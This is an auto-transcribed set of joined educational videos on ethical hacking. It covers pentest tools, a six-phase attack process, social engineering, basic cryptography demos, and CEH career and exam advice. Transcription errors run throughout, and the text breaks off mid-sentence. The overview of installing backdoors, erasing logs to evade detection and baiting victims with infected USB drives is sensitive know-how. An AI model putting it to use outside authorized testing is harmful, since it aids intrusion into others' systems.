accept contracts from organizations to increase their security posture at the same time they can also get themselves involved in malicious activities towards other organizations to personally gain or benefit from them by doing unauthorized activity script kitties are people uh who are technically not much aware about what hacking is uh they rely on existing tools that have been created by other hackers they have no technical knowledge of what they’re doing it’s just a hit or miss for them so they just get their hands on a tool they try to execute those tools uh if the hack works it works otherwise it doesn’t so these people are basically who are noobs or newbies who are trying to learn hacking or uh just uh people who with malice’s intent who just want to have some fun or trying to impress people around then we have the nation or the state sponsored hackers as the name suggests these hackers are sponsored by their government now this may not be a legitimate job but most of the governments do have uh hackers uh enrolled in their pay on um on their uh organizations to spy on their enemies to spy on various countries and try to figure out uh the aspirations of those countries so this is basically a spying activity where you are technically trying to get access to other count’s resources and then try to spy on them to figure out what their activities have been or what their future plans have been and then we have the activists who is an individual who has a political agenda to promote and they promote it by doing hacking so uh these guys what is the difference between a black hat hacker and a activist the black hat hacker may try to hide their identity activist will claim responsibility of what they have done so for them it’s a political agenda a political cause and they will try to hack various organizations to promote their cause they would probably do this by defacing the website and posting the messages that they want to promote on these websites so what exactly is ethical hacking then we have discussed the types of hackers we have identified a malicious hacker as a black hat hacker with the intent uh of doing harm to an organization’s network for personal gain we have discussed what the ethical hacker is so an ethical hacker would be doing the same activity but in an authorized manner so they would have legal contracts that they would be signing with the organization which would give them a definite scope of what they’re allowed to do and what they are not allowed to do and the ethical hackers would function within those scopes would try to execute those test scenarios where they would be able to identify those flaws or those system vulnerabilities and then they would be submitting a report to the management of what they have found they would also help the management to mitigate or to resolve those weaknesses so that nobody else can misuse them later on they might use the same techniques and the same tools that blackhead hackers do however the main difference here is that these guys are authorized to do that particular activity they’re doing it in a controlled manner with the intent of helping the organization and not with the intent of personal gains so who’s an ethical hacker again an ethical hacker is a highly intelligent highly educated person who knows how computers function how programming languages work how operating systems work they can troubleshoot they’re technically very adept at computing they understand the architecture they understand uh how various components in a computer work they can troubleshoot those components and they can basically be uh very good with programming as well now when I say programming we don’t want the ethical hacker to be a good developer of applications we want them to understand programming in such a way that they can create scripts they can write their own short programs like viruses worms trojans or exploits which would help them achieve the objective that they have set out for so uh here you can see the ethical hacker they are individuals who perform a security assessment of their companies with the permission of cons concerned authorities so what is a security assessment a security assessment is finding out the exact security posture of the organization by identifying what security controls are in place how they’ve been configured and if there are any gaps in the configurations themselves so an organization will hire a ethical hacker they they would give the ethical hacker the information about what information is or what security controls what firewalls what IDs IPSS introen detection or introen prevention systems antiviruses are already in place and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization what is the need of an ethical hacker the need of an ethical hacker is proactive security the ethical hacker would identify all the existing flaws in an organization and try to resolve those flaws to help secure the organization from blackhead hackers so ethical hackers would prevent hackers from cracking into an organization’s network by securing the organization by improving on their security on a periodic basis and they would also try to identify system vulnerabilities network vulnerabilities or application level vulnerabilities that would have been missed or have already been missed and then try to figure out a way of plugging them or uh resolving them so that they cannot be misused by other hackers they would also analyze and enhance an organization security policies now what are policies policies are basically documents that have been created by an organization of rules that all the employees need to follow to ensure that the security of an organization is maintained for example a password policy a password policy would help users in an organization to adhere to the standards the organization has identified for a password complexity for example a password when a user is creating them should adhere to standards where they are using random words they are uh they contain the alphabet A through zed uppercase and lowerase 0 through 9 as numeric and special characters and they’re randomized so that the password becomes more more stronger to prevent from brute force attacks so what would an ethical hacker do at this point in time they would try to test the strength of the passwords to see if brute force attacks or dictionary attacks are possible and if any of these passwords can be cracked they would ensure that all the employees are following the policies and all the passwords are are as secured as the policies want them to be if there are any gaps in the policies or the implementation of the policy it is the ethical hacker’s responsibility to identify those gaps and warn the organization about it similarly they would also try to protect any personal information any data that is owned by the organization that is critical for the functioning of the organization and they’ll try to protect it by from falling into the hacker’s hands now what are the skills that are required of an ethical hacker these are the following skills so first and foremost they should have good knowledge with operating systems such as Windows Linux Unix and Mac now when we say knowledge about operating systems it’s not only about how to use those operating systems but how to troubleshoot those operating systems how these operating systems work how these operating systems need to be configured how can they be secured for example securing an operating system is not only installing a firewall and an antivirus but you need to configure permissions on an operating system of what users are allowed to do and what users are not allowed to do for example limiting the installation of applications how are we going to do that we need to go into the system center the security center of Windows and we need to configure security parameters over there of what are acceptable softwares and what are not same with Linux and uh Mac softwares operating systems so we need to know how we can secure these operating systems similarly all of these would have desktop versions and server versions of operating systems as a ethical hacker we need to know the desktop and server versions both how to configure them and how to provide services within the organization on these servers so that they can be consumed in a secure manner by all the employees at the same time they should also be knowledgeable of programming languages or scripting languages such as PHP Python Ruby HTML for programming if you will because web servers come into the picture so again they should not be great developers where they can create huge applications but they should be able to develop scripts understand those scripts analyze those scripts and figure out what the output should be of those scripts to achieve the hacking goals that they have set out for an ethical hacker should have a very good understanding about networking no matter whether you’re in application security you’re in network security or you’re in hostbased security since a computer will always be connected to a network either a local area network like a LAN or the internet we should know how networking works we should know the seven layers of the OSI model we should know which protocols work on those seven layers we should identify the TCP IP model and how OSI model can be mapped to the TCP IP model we should understand how TCP and UDP work how uh how each and every protocol is crafted how they are supposed to behave for us to analyze and understand any network-based attacks we should be very good in security measures so we should know where those vulnerabilities would lie what are the latest exploits available in the market and we should be able to identify them we should be able to know the techniques and the tools of how to deal with security how to analyze security and then how to implement security to enhance it as well along with that it is important that a security analyst or ethical hacker is aware of the local security laws and standards why is that because an organization cannot do any illegal activity whatever responses that they have whatever security mechanisms whatever security controls they will implement they need to be adhering to the local law of the land they should be legal in nature and should not cause undue harm to any of the employees or any of the third party clients that they are dealing with so the ethical hackers should be aware of what uh security laws are before they implement security controls or even before they start testing for security controls and all of these should be backed up by having a global certification or a globally valid certification related to networking related to security ethical hacking the law of the land anything and everything maybe even programming uh it’s good to have a certification in PHP Pearl Python Ruby and so on so forth why because most of the organizations when they hire ethical hackers look out for these certifications especially globally valid certifications so that they can be sure or they can be assured that the person that they are hiring has the required skill set so let’s talk about a few of the tools that a ethical hacker would utilize uh in their testing scenarios to be honest there are hundreds of tools out there what you see on the screen are just a few examples of them uh Nessus is a vulnerability scanner what is a vulnerability scanner it is an automated tool that is designed to identify vulnerabilities within hosts within uh operating systems within networks so they come with their readymade databases of all the vulnerabilities that have already been identified and they scan the network against that database to find out any possible flaws or any possible vulnerabilities that currently exist on the host or the operating system or on the network similarly there would be application scanners like uh Aunetics or Arachnne that would help you scan applications and identify flaws within those applications as well now all of these are automated tools the essence of ethical hacker is when these tools churn out the reports the ethical hack hacker can understand these reports analyze them identify the flaws and then craft their own exploits or use existing exploits in a particular manner so that they can get access or they can bypass the access security controls mechanisms that are already in place how can they do that with the tool called metas-loit you see that big M there on the right hand side that M logo is for a tool called metas-loit which is a penetration testing tool what is a penetration testing tool it is that tool that will allow a ethical hacker to craft their exploits or choose their exploits for the vulnerabilities that have been identified by Nessus since we are interacting with computers we will always be interacting using tools right so the first tool Nessus identifies the flaws and the possible list of vulnerabilities we do a penetration test using metasloit to validate those flaws and to verify that those flaws actually exist and try to figure out the complexity of those flaws and that’s where metasloit helps us do that wireshark would be used in the background while we are doing both the activities using Nessus or Metasloit to keep a track of what packets are being sent and by received on the network which will help us analyze those packets so whenever I run a Nessus scanner I would run a wireshark in the background it will capture the data packets and I can go through those data packets and analyze that data packets to identify what Nessus is actually trying to do similarly when I try to attack a machine using exploit on metas-ploit I will keep on wireshark running in the background to capture the data packets that have been sent and the responses that I’ve received from the victim so that I can also go through those packets and analyze the responses and analyze the attack whether it was successful to what extent was it successful and basically will also give me a validation a proof of the activity that has happened n MAP is another automated tool that allows me to scan for open ports and protocols so why would I use N MAPAP because pro ports and protocols become an entry point for a hacker to gain access to devices for example when we connect to a web server we connect through a web browser but we automatically connect to port 80 using HTTP and port 443 is using HTTPS so if I’m connecting to a web server using HTTPS it is safe to assume that port 443 on the web server is open to accept those connections similarly there would be other services that may be left open on the web server because nobody thought about configuring it or they misconfigured the web server and they left unwanted services running so end mapap will allow me to scan those ports and services and allow me to understand what services are being offered on that server so then I can start analyzing that server identify those flaws within those services and then try to attack them if the application that I’m analyzing is connected to a database and I want to do a SQL injection attack or if I if Nessus tells me that there is a SQL injection attack that may be possible on that particular application I can use an automated tool called SQL map or SQL map that would allow me to automatically craft all the queries that are required for a SQL injection attack and help me do that attack at the same time so here I do not have to manually create my own queries uh the SQL map tool would automatically create them for me what I would do is I would use Nessus to identify that particular flaw if Nessus reports that flaw I would then go use the tool SQL map configure it to attack that particular web server and when I fire off the tool it will then automatically start directing queries SQL injection queries to the database to see if those uh databases are vulnerable and if yes what data can be retrieved from those databases so all of these tools in a nutshell would help me hack networks applications operating systems and host devices and this is what the ethical hacker does they use these kind of tool sets they identify what attacks they need to do they identify the right tool for that particular attack and they write their exploits they create those attacks and then they start attacking analyze the response and then give a report to the management uh providing them feedback about how the attack was created or crafted what was the response to that attack and whether the attack was successful or not if successful they would also give recommendations of what to do to prevent these attacks from happening in the future so when we are doing these attacks or when we want to launch these attacks what is the process that we would follow so there are six steps that we would do as a ethical hacker if you’re just a hacker you probably wouldn’t do the sixth step which is a reporting step so the first step that would be done is the reconnaissance phase which is the information gathering phase which is very important from ethical hackers perspective or a hacker’s perspective because if I want to attack someone or something as a digital device I need to know what I’m attacking i need to know the IP address of the device the MAC address of those devices i need to know the operating system the build or the version of that operating systems applications on top the versions of those applications so I know what I’m attacking for example if I if I want to attack a server I assume it’s a Windowsbased server and I use a particular tool to attack it but it actually turns out to be a Linux based server my attacks are going to be unsuccessful so I need to focus my attack based on what is there at the other end so in my information gathering phase I want to identify all of that information once I have that information done I’m going to scan those servers using tools like end mapap that we just talked about and we’re going to try to see the open ports open services and protocols that are running on that server that can give me possible entry points within the network or within the device or within the operating system at the same time along with the scanning with end mapap I would run a vulnerability scanner the necess vulnerability scanner we talked about or aetics for applications and then I would try to identify vulnerabilities in those applications operating systems or networks once I have identified those vulnerabilities in the scanning phase I would then move on to the gaining phase where I would then craft my exploits or choose existing exploits and start attacking the attacking the victim at this point in time if my attack is successful I will probably have gained access uh by either cracking passwords or escalating privileges or exploiting a vulnerability that I may have found during the scanning phase once I have gained my access I want to maintain my access why because the vulnerability may not be there for long maybe somebody updated the operating system and hence the flaw was no longer exist existing or somebody changed the password that may I may have cracked thus I no longer have access so what do I do to maintain my access i install Trojans or backdoor entries to those systems using which I can secretly in a covert manner get access to those devices at my own will at my own time as long as those devices are available over the network so that’s where I maintain my access i have hacked them now I want to maintain my access so I install a software which would give me a backdoor entry to that device no matter what once I have done this I want to clear my track so whatever activity that I’ve been doing for example installing a Trojan a Trojan is also a software that would create directory directories and files once installed on the victim’s machine so I want to hide that if I have access data stores if I have modified data I want to hide that activity because if the victim comes to know that something has happened they would start they would start increasing their security parameters they might start scanning their devices they may take them offline thus my hack would no longer be efficient the reason I’m clearing my tracks is that the victim doesn’t find out that they have been hacked or they have been compromised or even if they do find out that they’ve been compromised they cannot trace the compromise back to me so I would be deleting references of any of the IP addresses or MAC addresses that I may have used to attack that particular device and this is where I will be able to identify where those logs were created where those traces are once I take off those traces the victim would not be any wiser of whether they have been compromised or who compromised their system and if I am successful at all of these stages or what to whatever extent the success that I’ve achieved in any of these stages I would then create a report based on that and I would report to the management about the activities that we have been able to do and whatever we have been able to achieve out of those activities for example we identified 10 different flaws there were 20 different attacks that we wanted to do what attack did we do what was the outcome of that attack what was the intended or or the expected output of that attack i’ll create a report which would give a detailed analysis of all the steps that were taken along with screenshots and evidences of what activity was conducted what was the output what was the expected output and I would submit that report to the management giving them an idea of what vulnerabilities and flaws exist in their environment or their devices that need to be mitigated so that the security can be enhanced so these are the six steps that the ethical hacking process would take uh just going through this the uh reconnaissance is where you’re going to use hiking tools like NM map edge ping to obtain information about targets there are hundreds of tools out there depending on what information you want then in scanning again N mapose these kind of tools to be utilized to identify open ports protocols and services in gaining access you’re going to exploit a vulnerability by using the metasloit tool that we talked about in the previous slides in the maintaining access you’re going to install back doors you can use metasloit at the same time uh you can craft your own scripts to create a Trojan and install it on the victim’s machine once you have achieved that clearing tracks is where you’re going to clear all evidences of your activity so that you do not get caught or the victim doesn’t even realize that they have been hacked and once you have done all of this we are going to create reports that are going to be submitted to the management to help them understand the current security evaluation of their organization so now let’s see how we can hack using social engineering now what is social engineering social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed so this is where your social skill and your people skills come into the picture if you’re able to communicate effectively to another person they would probably give up more information that they intended to give out let’s look at look at examples right if you see on the screen fishing activity what is fishing we receive a lot of free emails on a regular basis we have always received those emails where we have won a lottery of a few million dollars but we have never realized that we didn’t purchase a lottery to win a lottery in the first place we have always had those Nigerian frauds where a prince died in some South African country and you out of 7 billion people on the planet have been identified where they want to transfer a few hundred million through your account and they want to give you 50% of that money in return as thank you some very basic attacks where you go on two websites and there’s a banner flashing at you saying “Congratulations you’re the 1 millionth visitor to this website click here to claim your prize.” All of these are social engineering attacks fishing attacks fake websites fake communications being sent out to users to prey on their gullibility most of humans always have that dream of striking it rich winning a huge lottery once and for all and living their life lavishly ever after but sadly in the real world that’s not that doesn’t happen that often and if you’re receiving those mails it is very important that you first research the validity of those those communications before you even want to act upon them so why are humans susceptible to social engineering because humans have emotion machines do not try pleading with a machine to give you access to a account that you have forgotten a password to the machine wouldn’t even know what you’re doing try pleading with a human sympathy or empathy where you could try to create a social engine injuring attack where you can plead with them saying if I do not get access to this account immediately I might lose my job and then that would put my family into problems somebody would feel empathy or sympathy towards you and help you reset that password and give you access to that account it’s how good the attack is and how convincing you are for the success of this attack to happen so what is a familiarity exploit attackers interact with victims to gain information which will benefit the attack uh to crack credentials as passwords if we want to reset our passwords what do we have as a mechanism to resetting passwords we have some security questions that we set up those questions are nothing but personal information that we would know but through a social engineering attack we it would be easily be able to uh gather the information that you have set for your security questions the security questions can be as simple as the first school that you attended you probably have that listed on your LinkedIn profile where a per person can just go in there and see your academic qualifications and identify the school that you were in right similarly it might also be a question what was your mother’s maiden name that’s a very good attack and that’s uh I mean if a person can interact with you let’s say they’re trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing and they ask you these questions you wouldn’t think twice before giving those answers as long as the request sounds legitimate to us we are able to justify that request we do answer those queries so it’s upon us to verify the authenticity of the request coming in before we answer it fishing as discussed would be fraudulent emails which appear to be coming from a trusted source so email spoofing comes into mind fake websites and so on so forth exploiting human curiosity curiosity killed the cat right so there was there’s so many physical attacks where hackers just keep pen drives lying around in a parking lot now this is a open generic attack whoever falls victim will fall victim so if I just throw around a few USBs in the parking lot obviously with Trojans implemented on them some people who are curious or who are looking for a couple of freebies might take up those pen drives plug them in their computers to see what data is on the pen drives at the same time once they plug in there those pen drives on their computers the virus or the Trojan would get infected and cause harm to their machine then exploiting human greed we just talked about the Nigerian frauds and the lotteryies those kind of attacks the fake money-making gimmicks now basically this is where you prey upon the person’s uh greed kicking in and they clicking on those links in order to uh get that money that has been promised to them in that email so one of the safest mechanism to keep data private and to keep yourself secure is using encryption now encryption can happen through cryptography what is cryptography cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user the only person with the key to unscramble that data would be able to unscramble it and make sense out of that data so we’re just making it unreadable or non-readable by using a particular key or a particular algorithm and then we’re going to send the key to the end user the end user using the uh same key would then decrypt that data if anybody compromises that data while it is being sent over the network since it is encrypted they would not be able to read it so the encryption algorithm would be something like this now if you see uh the computer word once made into unreadable format would look like eq o r xv gt for a end user it wouldn’t make any sense but the person who has a key to unscramble that would be able to convert it back to computer and then understand the meaning of that word so this is just a substitution cipher that is being shown on the screen so what is the alphabet the key is alphabet + 3 so c plus three alphabets that becomes e o becomes m becomes o so the key that is utilized to scramble the data is the character that you are at the third character from there would be the corresponding key so the encrypted message is also known as a cipher the decryption is just the other way around where you know the key now and you can now figure out what that e correspondent to by going back three characters in the alphabet most of the times a certified ethical hacker must decrypt a message without knowing the secret key so let’s say a ransomware has affected your organization or has affected a device and you want to figure out uh or you want to decrypt that data now as a ethical hacker you wouldn’t be for paying a ransom uh to the hacker would you so it is now your prerogative of how you’re going to work around and how you’re going to try to crack the encryption mechanism how to crack the cipher to decrypt that message and see what’s within it right decryption without the use of a secret key that is known as a crypt analysis crypto analysis is the reversing of an algorithm to figure out what the decryption was without using a key so cryp analysis can be done using various formats the first one is a brute force attack second is a dictionary attack the third one is a rainbow table attack a brute force attack is trying every combination permutation and combination of the key to figure out what the key was it is 100% successful but may take a lot of time a dictionary attack is where you have created a list of possible encryption mechanisms a list of possible cracks and then you try to figure out whether those cracks work or not rainbow tables are where you have an encrypted text in hand and you’re trying to figure out uh the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place so in the brute force attack you’re trying every possible combination permutation of what the key would be in dictionary attack you have a word list that would tantamount to the key and if you’re you’re trying to match all the words listed in the text file or the word list to see if any of those words are going to work to decrypt that data here in the rainbow table the cipher text is compared with another cipher text you find out similarities and then you try to work or reverse engineer your way accordingly so let’s have a quick demo on cryptography before we end this session so to begin with the demo of cryptography we are on a website called spammimic.com which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand so if I say I want to encode a message turn a short message into spam so what this does is want to send across a secret message you type in the secret message a short one and it will convert that into a spam mail you send it across so whoever is reading that spam mail would never get an idea of the embedded message within it so if I want to type in a message here hi this is a secret message the password is askd at the rate 1 2 3 4 and I want to send this out to people or to one of my colleagues but I want to send it out in a secret manner so that others are not aware of this so when I press on encode what the algorithm would do is it will convert this message into a spam mail so my message hi this is a secret message the password is at the rate 1 2 3 4 or asd at the rate 1 2 3 4 gets converted into this now if you read it dear e-commerce professional this letter was specially selected to be sent to you this doesn’t make sense there is nowhere or no reference to the actual message that I’ve already said so if I copy this entire message and I send it let’s say via email to the recipient now the thing is that the recipient needs to know that I’ve encoded it using spam mimic the algorithm rem need needs to remain the same so once they know that it is spam mimic what they can do is now in this instance what I’m going to do is I’m going to open up a new browser and I’m going to go to the same website and at this point in time I’m going to click on decode when I click on decode I’m going to paste the message that I have just copied there we are and this message is now being copied into a different browser and if I decode this you will see that it will convert it back to the original message that there was so the key is there at spam mimic and uh it is embedded within the message so whenever we paste the message in the decode factor it knows what the key was and it can decrypt that message and give me the actual message that was embedded within it there we are the entire message this is what we created in the Google Chrome browser and in the Firefox browser we decoded similarly if I want to protect these kind of messages there is an aspen encrypt.com website where let’s say we use text encryption and I want to encrypt the same message this is a secret message the password is ASD at the rate 1 2 3 4 and then I give it a password to protect this message let’s say the word password and I use the cipher to scramble this by using let’s say AES which is the strongest cipher right now and I say encrypt so this is what the encryption would look like and basically uh if I don’t have the password over here if I decrypt it you would see that the error has occurred now if I type in the password over here and then decrypt it it will be able to convert that back into the unscrambled text and it will give me what the original message was this is a secret message the password is ASD at the rate 1 2 3 4 so if I want to keep my data secure from hackers I want to scramble it in such a way that they would not be able to crack it or it would be very difficult from for them to crack it and this is one of the first mechanisms that would be recommended by any ethical hacker and before we begin if you are someone who is interested in building a career in cyber security or to become an ethical hacker by graduating from the best universities or a professional who elicits to switch career with cyber security or ethical hacker by learning from the experts then try giving a show to simply learn postgraduate program in cyber security with modules from MIT Schwarzman College of Computing the course link is mentioned in the description box below that will navigate you to the course page where you can find a complete overview of the program being offered hello everyone and welcome to this video on the hackers road map at the simpleland YouTube channel as vast as the field of cyber security is there’s often an overflow of information about it at the same time for people who wish to know more about how to venture into the cyber security or ethical hacking space it is very important for them to know what’s the career progression what are the skills needed and how a person with no or bare minimum knowledge can take their first step in this amazing career well this video is for all those individuals who wish to pursue a career in the field of cyber security and ethical hacking whether you are an entry- level professional a college graduate or an experienced professional looking to understand how a career in the field of cyber security progresses and what additional skills and responsibilities would you need as you grow in the field then you are at the right place so let’s get started with our topic the hacker’s road map and before we begin if you are someone who is interested in building a career in cyber security by graduating from the best universities or a professional who elicits to switch careers with cyber security by learning from the experts then try giving a shot to simply lens postgraduate program in cyber security with modules from MIT Schwarzman College of Engineering the course link is mentioned in the description box that will navigate you to the course page where you can find a complete overview of the program being offered and if these are the types of videos you would like to watch then hit the subscribe button like and press on the bell icon to never miss on further content so stay tuned with us until the end of this video and don’t forget to register your opinion in the comment section below and now we will start with what is ethical hacking and how is it different from hacking so in the world of cyber security hacking can be broadly categorized into two types ethical hacking and unethical hacking ethical hacking involves using the same tools and techniques as malicious hackers to identify and fix security vulnerabilities before they can be exploited and these expert known as whitehead hackers work with a focus on security rather on theft and on the other hand we have unethical hacking that refers to unauthorized access to digital devices or networks with malicious intent performed by black hackers and additionally there are greyhackers who possess knowledge in offensive and defensive computer use sometimes working as security consultants during the day and engaging in blackhead activities at night it is important to understand these distinctions to protect against cyber threats effectively now we’ll see the objective or roles of an ethical hacker ethical hackers also known as whitehead hackers use their skills and expertise to identify vulnerabilities in system and network before malicious hackers can exploit them their primary objective is to simulate real world attacks and help organization strengthen their security measures the role of an ethical hacker involves several key phases and we’ll see those roles and key phases so they are responsible for reconnaissance scanning gain and maintain access clear their tracks document their findings and compile detailed reports so firstly they conduct thorough reconance gathering information about the target system or organization this includes understanding the organization structure network infrastructure and potential weak points and through scanning they identify the easiest and quickest methods to gain access to the network and gather further information and once access is gained ethical hackers maintain it allowing them to exercise their privileges and control the connected systems this step helps them identify any potential security flaws and weaknesses within the network they also work to clear their tracks covering their footsteps to evade detection and ensuring the security personnel cannot trace their activities and throughout the entire process ethical hackers document their findings compile detailed reports on the vulnerabilities discovered and provide recommendations to address and mitigate the identified security issues their vulnerability goal is to help organization strengthen their defenses prevent data breaches and protect sensitive information from falling into the wrong hands ethical hacking is a crucial aspect of cyber security as it allows organizations to stay one step ahead of cyber threats by leveraging the skills of ethical hackers businesses can proactively identify and address vulnerabilities ensuring the overall security and integrity of their digital infrastructure so now we’ll see the skills that needed to be an ethical hacker so now we’ll see the skills so the first skill is knowledge of computer networks then it’s the programming languages then the knowledge of web applications databases ethical hacking tools and knowledge of common attack vectors and techniques then what certificates that are required for an ethical hacker now we will start with knowledge of computer networks understanding computer networks is fundamental for ethical hackers this includes concepts such as IP addressing network protocols example TCP IP routing switching and firewalls a strong grasp of how networks function will enable you to identify vulnerabilities and potential entry points the next is programming languages proficiency in programming languages is essential for effective ethical hacking languages like Python Java C++ and scripting languages such as Pearl or Ruby are widely used in this field programming skills enable you to write custom scripts and tools automate task and exploit vulnerabilities and the next we have is web applications in today’s digital landscape web applications are often the target of attacks therefore a solid understanding of web application architecture protocols example HTTP and security mechanisms example SSL TLS is crucial knowledge of web programming languages like HTML CSS JavaScript and frameworks like PHP or ASP.NET is also beneficial then we have databases so databases store and manage sensitive data making them attractive targets for hackers familiarize yourself with database management systems DBMS such as MySQL Oracle or Microsoft SQL Server learn about database security including access control encryption and vulnerability assessment then we should focus on the skill to have a knowledge on ethical hacking tools so to perform ethical hacking task efficiently you should be familiar with various hacking tools these include network scanners example end mapap vulnerability scanners example Nessus password crackers jo the rier packet snipers wireshock and exploitation frameworks metasloit mastering these tools will enhance your effectiveness as an ethical hacker then you should have knowledge of common attack vectors and techniques that is understanding common attack vectors and techniques is vital for an ethical hacker this includes knowledge of different types of malware social engineering network attacks that is DDoS and web application vulnerabilities example cross-ite scripting staying up to date with the latest threats and attack methodologies is crucial for effective defense the next is certificates so obtaining relevant certifications demonstrates your expertise and commitment to the field certificates like certified ethical hacker CH offensive security certificate professional OCP or CompTIA security plus are highly regarded within the industry they validate your skills and can boost your credibility when seeking ethical hacking opportunities the C certification is a multiplechoice exam that evaluates your understanding of the penetration testing structure and the tools that are utilized inside it it gives job seekers the information security field a head start by ensuring that the certificate holder understands the fundamentals such as information gathering attacking computers or servers wireless attacks and social engineering so the objective CH is inform the public that credentialized individuals meet or exceed the minimum standards second establish and govern minimum standards of credentiality third professional information security specialist in ethical hacking so now we will have an exam overview so the exam name is EC council certified ethical hacker and the exam duration is 240 minutes and you will get questions that is 125 questions you will get in the exam and it is a multiplechoice question exam and the passing score you need is 70% and to register for the exam you should go to Pearson view or ECC exam center and eligibility criteria for CH is there are two ways to satisfy the eligibility criteria that is attend official CH training and this can be in any format example instructorled training computer-based training or live online training as long as the program is approved by EC council and attempt without official training in order to be considered for the EC council certification exam without attending official training you must have two or more years of documented information security experience ra non-refundable eligibility application fee of $100 submit completed CH exam eligibility form including verification from an employer upon approval EC council will email you a voucher number to register for the CH exam so this was all about the CH exam and now we will move to the steps to become ethical hacker so ethical hacking is an exciting and rapidly growing field that requires a combination of technical skills knowledge and a strong sense of ethics by following these steps you can begin your journey towards becoming an ethical hacker and contribute to enhancing cyber security so step one that is knowledge of computer systems and networks step two you should have proficiency in programming languages step three networking and security concepts you should have a knowledge of it third knowledge of web application and database fifth understanding of operating systems step six familiarity with ethical hacking tools step seven problem solving and analytical thinking step eight knowledge of common attack vectors and techniques step nine certifications so now we will elaborate all the steps one by one so we’ll start with knowledge of computer systems and networks so to become an ethical hacker it is crucial to have a deep understanding of computer systems and networks this involves familiarizing yourself with the inner workings of computer system network protocols operating systems and how different components interact within a network environment by gaining this knowledge you will be better equipped to identify vulnerabilities and assess potential security risk and the next is proficiency in programming languages so programming languages are an essential tool for ethical hackers by gaining proficiency in programming languages such as Python C++ Java JavaScript SQL Pearl and Ruby you will be able to develop your own scripts automate task and create exploit codes these programming languages provide the foundation for writing secure and efficient code as well as manipulating and analyzing data the next step is networking and security concepts to effectively assess and secure networks it is important to have a solid understanding of networking and security concept this includes familiarizing yourself with topics such as network protocols network security principles encryption techniques and firewall configurations understanding how data is transmitted secured and protected in a network environment will enable you to identify potential vulnerabilities and implement appropriate security measures step four knowledge of web application and database knowledge so in today’s interconnected world web applications and databases are common targets for hackers therefore it is crucial to develop a strong understanding of web application architectures web protocols and database systems pay special attention to common vulnerabilities specific to web applications such as SQL injection cross-ite scripting XSS and cross-sight request forgery CSRF by gaining expertise in these areas you will be able to effectively assess the security of web applications and databases and provide appropriate recommendations for securing them and the next step is understanding of operating systems so operating systems form the backbone of computer systems and are often targeted by hackers it is important to gain a comprehensive understanding of different operating systems such as Windows Linux or Mac OS this includes understanding system configurations file permissions user management and security mechanisms specific to each operating system this knowledge will enable you to identify vulnerabilities apply patches and secure operating systems effectively step six familiarity with ethical hacking tools ethical hackers rely on a variety of tools to assess and secure systems and networks familiarize yourself with popular ethical hacking tools such as Matt Plot Wireshark Nap Burp Suit Kali Linux Canvas SQL Ninja and Bobby these tools provide functionalities for vulnerability scanning network sniffing exploit development and penetration testing understanding how to use these tools effectively will enhance your capabilities as an ethical hacker now we’ll see the step seven that is problem solving and analytical thinking so being an ethical hacker requires strong problem solving skills and the ability to think analytically you will often encounter complex systems and face intricate security challenges developing your problem solving abilities and analytical thinking will help you approach these challenges systematically identify vulnerabilities and deise effective strategies to mitigate risk it is essential to stay updated with the latest security trends and technologies to enhance your problem solving skills and the step it is knowledge of common attack vectors and techniques so to defend against potential threats you must familiarize yourself with common hacking techniques and attack vectors used by malicious hackers this includes social engineering fishing attacks password cracking network based attacks and more understanding how these attacks work and the methodologies used will enable you to proactively identify and prevent potential security breaches and now the step nine that is certifications while certifications are not mandatory to start a career in ethical hacking they can provide a structured learning path and validate your skills and knowledge consider pursuing certifications such as certified ethical hacker CH Offensive Security Certified Professional OCP Certified Information System Security Professional CISSP Certified Penetration Testing Engineer CPTE and Certified Security Analyst ECSA these certifications demonstrate your expertise and dedication to the field enhancing your credibility as an ethical hacker now we’ll see the job roles in ethical hacking field so starting with like there are several job roles in ethical hacking such as here’s an elaboration on each job role in ethical hacking and we’ll see some of the major ethical hacker job roles so starting with ethical hacker so an ethical hacker is a skilled professional who legally attempts to penetrate computer system and networks to identify vulnerabilities and weaknesses they use their knowledge to strengthen the security infrastructure and protect against cyber threats and the next is network security engineer network security engineers specialize in securing and

maintaining computer networks within an organization they implement and manage security measures such as firewalls intrusion detection systems and virtual private networks that is VPNs to protect sensitive data then we have cyber security analyst so cyber security analyst monitor and analyze systems for potential security breaches or incidents they investigate threats develop security protocols and implement measures to protect against attacks the next is penetration tester penetration testers also known as ethical hackers simulate real world attacks to identify vulnerabilities in computer systems networks and applications they conduct thorough assessments and provide recommendations for improving security the next is information security manager information security managers are responsible for overseeing an organization’s overall security strategy and ensuring the protection of sensitive data they develop and implement security policies manage security teams and handle incident response and the next is cyber security engineer so cyber security engineers design and implement security systems including firewalls encryption protocols and intrusion detection systems they also conduct risk assessments and perform security audits to maintain a security environment and the next is security consultant security consultants provide expert advice and guidance on security strategies and solutions they assess vulnerabilities develop security plans and assist organizations in improving their overall security posture in the United States these requirements are very high and this was all for this tutorial did you know that in August this year Google openly admitted that some of its Gmail accounts were hacked by an Iranian group fortunately the event was isolated and was taken care of but rarely are security breaches this easy to stop with more and more data moving to the cloud the prospects of hacks like these have grown in the past decade exponentially consequently organizations have now discovered the need to secure the digital infrastructure against various attack vectors fueling the need for ethical hackers in the IT industry see today’s video is all about how you can learn the ins and outs of hacking and cyber security irrespective of your learning background so welcome to our video on how to become an ethical hacker by simply learning before we get started ensure you’re subscribed to our channel so you always stay updated with the latest technologies and trends let’s first clear the air on an ethical hacker’s role the term hacking has inherently negative connotations however this will only be applicable until the duty of an ethical hacker is properly understood ethical hackers are the good people in the hacking field wearing the white hat so what exactly is the responsibility of an ethical hacker instead of utilizing their extensive computer expertise for criminal purposes ethical hackers find gaps in data and computer security for businesses and organizations worldwide to defend themselves against hackers with less than noble intentions ethical hacking is a subcategory of cyber security that involves lawfully breaking a system security mechanisms in order to discover possible threats and data leaks on the network ethical hackers can work for a corporation as independent freelancers in-house security staff for its website or its applications or as simulated offensive cyber security professionals as well all of these careers need knowledge of current attack methodologies and tools albeit the in-house expert may need to be knowledgeable about a single kind of software or digital asset but how can you hone your ethical hacking skills let’s take a look at few steps one can take while starting a career in this field the first step is getting comfortable with Linux there are operating systems catered specifically to ethical hackers like Kali Linux and Parrot Security both are based on Linux derivatives and have a plethora of tools to make your hacking workflow easy and relatively stress-free the better vers you are with Linux and its terminal the quicker you can achieve things when hacking the next would be 